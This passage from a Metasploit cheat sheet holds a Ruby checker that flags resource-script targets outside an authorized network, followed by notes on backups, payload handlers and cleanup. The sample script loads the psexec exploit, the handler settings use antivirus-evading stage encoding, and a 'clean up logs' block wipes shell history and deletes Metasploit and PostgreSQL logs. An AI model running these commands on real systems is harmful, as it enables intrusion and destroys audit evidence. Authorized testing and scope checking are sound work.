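# Default way to read a file:/path target list; the demo injects a fake reader.
DEFAULT_READER = ->(path) { File.readlines(path, chomp: true) }

# Expand one RHOSTS token into a list of IPAddr objects (hosts or networks).
def expand_rhosts(token, file_reader: DEFAULT_READER)
  case token
  when /\Afile:(.+)\z/
    # file:/path -> one RHOSTS token per non-empty line of that file
    lines = file_reader.call(Regexp.last_match(1)).map(&:strip).reject(&:empty?)
    lines.flat_map { |t| expand_rhosts(t, file_reader: file_reader) }
  when /\A(\d+\.\d+\.\d+\.)(\d+)-(\d+)\z/
    # 192.168.1.100-110 -> every host from .100 to .110 inclusive
    prefix = Regexp.last_match(1)
    lo, hi = Regexp.last_match(2).to_i, Regexp.last_match(3).to_i
    raise ArgumentError, "bad last-octet range: #{token}" if lo > hi || hi > 255
    (lo..hi).map { |octet| IPAddr.new("#{prefix}#{octet}") }
  else
    # single host or CIDR; IPAddr raises IPAddr::InvalidAddressError on junk
    [IPAddr.new(token)]
  end
end

# A target (host or network) is in scope only if its whole address range lies
# inside one authorized network; checking both ends suffices for CIDR blocks.
def in_scope?(target, scope)
  range = target.to_range
  scope.any? { |net| net.include?(range.first) && net.include?(range.last) }
end

# Parse resource-script text and return [line_number, rhosts_value] pairs that
# reach outside the authorized scope. Trailing "# ..." comments are ignored.
def out_of_scope_targets(rc_text, authorized, file_reader: DEFAULT_READER)
  scope = authorized.map { |cidr| IPAddr.new(cidr) }
  violations = []
  rc_text.each_line.with_index(1) do |line, lineno|
    stmt = line.sub(/#.*/, '').strip
    m = stmt.match(/\Asetg?\s+RHOSTS?\s+(\S+)\z/i)
    next unless m
    targets = expand_rhosts(m[1], file_reader: file_reader)
    violations << [lineno, m[1]] if targets.any? { |t| !in_scope?(t, scope) }
  end
  violations
end

# Constructed sample resource script: the last two RHOSTS values leave the scope.
SAMPLE_RC = <<~RC
  # constructed sample, authorized scope is 192.168.1.0/24
  use auxiliary/scanner/smb/smb_version
  set RHOSTS 192.168.1.100-110   # Only authorized targets
  set THREADS 20
  run
  use exploit/windows/smb/psexec
  set RHOSTS 192.168.1.0/24
  setg RHOSTS file:/tmp/targets.txt
  set RHOST 10.0.0.1
  run
RC

AUTHORIZED_SCOPE = ['192.168.1.0/24'].freeze

# Constructed stand-in for file:/tmp/targets.txt so the example runs offline.
FAKE_TARGET_FILES = { '/tmp/targets.txt' => ['192.168.1.200', '172.16.0.5'] }.freeze
FAKE_READER = ->(path) { FAKE_TARGET_FILES.fetch(path) }

if $PROGRAM_NAME == __FILE__
  out_of_scope_targets(SAMPLE_RC, AUTHORIZED_SCOPE, file_reader: FAKE_READER).each do |lineno, value|
    puts "line #{lineno}: RHOSTS value #{value} is outside the authorized scope"
  end
end
```

Run it against a real resource script by passing `File.read('handler.rc')` and the scope from the authorization note; a non-empty result is a reason not to load the script.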
### Data Protection

```bash
# Encrypt database backup
msfdb stop
sudo -u postgres pg_dump msf > /tmp/msf_backup.sql
gpg -c /tmp/msf_backup.sql
rm /tmp/msf_backup.sql
```

```
# Secure communications
set LHOST 192.168.1.50
set LPORT 443
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
```

```bash
# Clean up logs
history -c
rm ~/.msf4/logs/*
sudo rm /var/log/postgresql/*
```
**Security Warning**: The Metasploit Framework is a powerful penetration testing tool that should be used only on systems you own or have explicit written authorization to test. Unauthorized use of this tool against systems you do not own is illegal and unethical. Always make sure you have proper authorization before conducting any security testing activity. This cheat sheet is intended for educational purposes and authorized security testing. Users are responsible for complying with all applicable laws and regulations in their jurisdiction.

**Additional Resources**:

- Official Metasploit Documentation
- Metasploit Unleashed Course
- [Rapid7 Community]
- [Metasploit GitHub Repository]